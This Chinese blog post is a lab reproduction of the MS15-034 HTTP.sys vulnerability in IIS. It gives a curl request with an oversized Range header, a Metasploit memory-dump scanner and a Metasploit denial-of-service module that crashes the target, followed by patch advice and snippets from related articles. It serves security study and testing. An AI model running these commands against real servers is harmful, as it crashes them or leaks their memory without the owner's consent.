漏洞复现MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞

最新推荐文章于 2025-03-20 15:31:37 发布
最新推荐文章于 2025-03-20 15:31:37 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: kali 漏洞复现 文章标签: 安全 web安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51950323/article/details/127772680
版权

漏洞描述:在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
漏洞影响范围:IIS 7.0以上的Windows 7/8/8.1和Windows Server 2008 R2/Server 2012/Server 2012 R2等操作系统。

一、环境搭建

攻击机:kali (192.168.2.129)

服务机:windows Server 2008 R2  (192.168.2.130)

win2008安装web服务

 

kali访问成功

二、漏洞验证

验证1.

kali终端输入

curl -v http://192.168.2.130 -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

 

返回状态码为416且出现The requested range is not satisfiable.则表示该漏洞存在。

验证2.

使用kali的msfconsole框架进行扫描

msfconsole
msf6> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6> set rhosts 192.168.2.130 //目标地址
msf6> run

 

 

三、漏洞利用

注意事项:该利用会导致目标机器蓝屏重启,请谨慎使用!

使用msfconsole框架进行利用

msfconsole

msf6> use auxiliary/dos/http/ms15_034_ulonglongadd 

msf6> set rhosts 192.168.2.130

msf6> set threads 10

msf6> run

 

 四、修补漏洞

打微软官方补丁。

CVE-2015-1635MS15-034漏洞复现
2301_81401822的博客
11-26 1697
1、漏洞背景201504月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。从微软的公告致谢来看,这个漏洞是由“Citrix Security Response Team”(美国思杰公司的安全响应团队)发现。这是对于服务器系统影响不小的安全漏洞,任何安装了微软。
Windows Server 2012 R2 MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞
友人A的博客
08-10 612
一、漏洞情况 1、漏洞情况 2、漏洞详情 二、整改记录 1、打开链接 2、点击下载 3、安装更新补丁 4、再次扫描没有该漏洞
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)
LiBai'S BLOG
08-18 9019
以下内容并非在靶场,是在真实环境进行漏洞验证。 1️⃣漏洞测试 使用curl工具进行测试,测试命令: curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615" 2️⃣漏洞验证 ????利用ms15-034漏洞读取服务器内存数据 借助metasploit平台: use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 1.
Windows Server MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
最新发布
y_66666666的博客
03-20 401
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。Microsoft Windows 7 SP1,Windows Server 2008 R2 SP1,Windows 8,Windows 8.1,Windows Server 2012 和Windows Server 2012 R2。如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
2401_83974087的博客
04-18 955
当存在CVE-2015-1635漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。该漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此漏洞。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
1stPeak's Blog
04-12 3330
一、漏洞描述 HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。 攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。 主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受
HTTP.sys远程执行代码漏洞CVE-2015-1635MS15-034
Fly_鹏程万里
05-05 9275
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635MS15-034
热门推荐
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
漏洞复现(二):HTTP.SYS远程代码执行漏洞(MS15-034)
weixin_47306547的博客
11-20 9628
漏洞介绍 漏洞编号:CVE-2015-1635MS15-034远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响范围 Windows 7 Windows Server 2008 R2 Windows 8 Windows Server 2012 Windows 8.1 Windows Server 2012 R2 漏
Windows Server 2008 R2 Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-18 1827
一、漏洞情况 1、 2、 二、整改记录 1、 2、 3、 4、 5、
web服务器软件漏洞MS15-034&CVE-2017-12615
kid的博客
07-24 1374
web服务器软件漏洞MS15-034&CVE-2017-12615) 想找找有没有能利用web服务器软件漏洞拿shell的,主要尝试了两个,但实际情况感人…(主要最近去了看雪安全开发者峰会,有大佬讲了最近很火的rdp那个洞,也提到了经典的永恒之蓝,确实这样的的洞很厉害啊,利用溢出直接攻陷主机,但二进制方面确实没有什么学习啊,所以突发奇想,想看看有没有什么利用iis,Apache之类的软件...
Http.sys远程代码执行漏洞复现
weixin_51387754的博客
04-23 957
Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。
MS15-034 HTTP.sys 远程执行代码(CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
CVE-2015-1635/MS15-034远程代码执行漏洞
dgjkkhcf的博客
09-20 4447
在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。
HTTP.SYS远程代码执行漏洞CVE-2015-1635,MS15-034
pyy的博客
12-11 1万+
漏洞描述及渗透过程 HTTP协议堆栈(HTTP.sys)中存在一个远程执行代码漏洞,该漏洞是在HTTP.sys不正确地分析特制HTTP请求时引起的。   漏洞危害 攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。 修复建议 1)微软官方已经给出修复补丁(KB3042553),用户安装修复补丁即可。 2) 变通办法,禁用IIS内核...
MS15-034漏洞复现及python编写对应POC脚本
weixin_49340699的博客
07-29 1541
MS15-034漏洞复现及python编写对应POC脚本环境搭建编写python漏洞检测脚本总结 环境搭建 首先我们到官网查看对应漏洞的信息https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 可以得知该漏洞适用于很多环境我们这里就用win7来构建靶机环境 在win7安装ISS 勾选上图上两项 然后就开始安装了等待几分钟后(可能要重启) 验证安装成功否打开浏览器访问127.0.0.1 如图则安装
HTTP.sys ms15-034 远程代码执行漏㓊(CVE-2015-1635
qq_68163788的博客
06-28 2302
HTTP.sys ms15-034 远程代码执行漏洞CVE-2015-1635)是一种远程命令执行漏洞,允许攻击者通过发送特制的HTTP请求触发漏洞,从而在受影响的系统上执行恶意代码。这个漏洞Microsoft Windows中的HTTP服务模块(HTTP.sys)中被发现。漏洞影响了Windows 7、Windows 8、Windows 8.1、Windows Server 2008 R2、Windows Server 2012和Windows Server 2012 R2。漏洞允许攻击者在系统上执行
HTTP.sys 远程代码执行漏洞
山兔的博客
05-27 269
18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,这个“整数溢出”必然同这个异常的超大整数有关,若IIS服务器返回“416 Requested Range Not Satisfiable”,则是存在漏洞,若返回”The request has an invalid header name“,或其他状态码则说明漏洞已经修补。 对目标网站抓包,一般使用.js、.css、或图片类文件进行验证,在数据包中加入Range:
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP请求来利用该漏洞。 该漏洞原理是在HTTP.sys驱动程序中存在一个缓冲区溢出漏洞,攻击者可以通过发送特制的HTTP请求来触发该漏洞。当HTTP.sys驱动程序接收到特制的HTTP请求时,它会尝试解析请求头,并将其复制到缓冲区中。但如果请求头中包含了一些特定的数据,就会导致缓冲区溢出,从而使攻击者能够执行任意代码。 为了检测该漏洞,可以使用一些漏洞扫描工具,如Nessus、OpenVAS等。这些工具可以通过发送特制的HTTP请求来检测目标系统是否存在该漏洞。 同时,为了防止该漏洞的利用,可以采取以下措施: 1. 安装Microsoft发布的安全补丁; 2. 禁用WebDAV; 3. 配置网络防火墙,限制HTTP请求的访问权限; 4. 使用WAF(Web应用程序防火墙)等安全设备,对HTTP请求进行过滤和检查。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值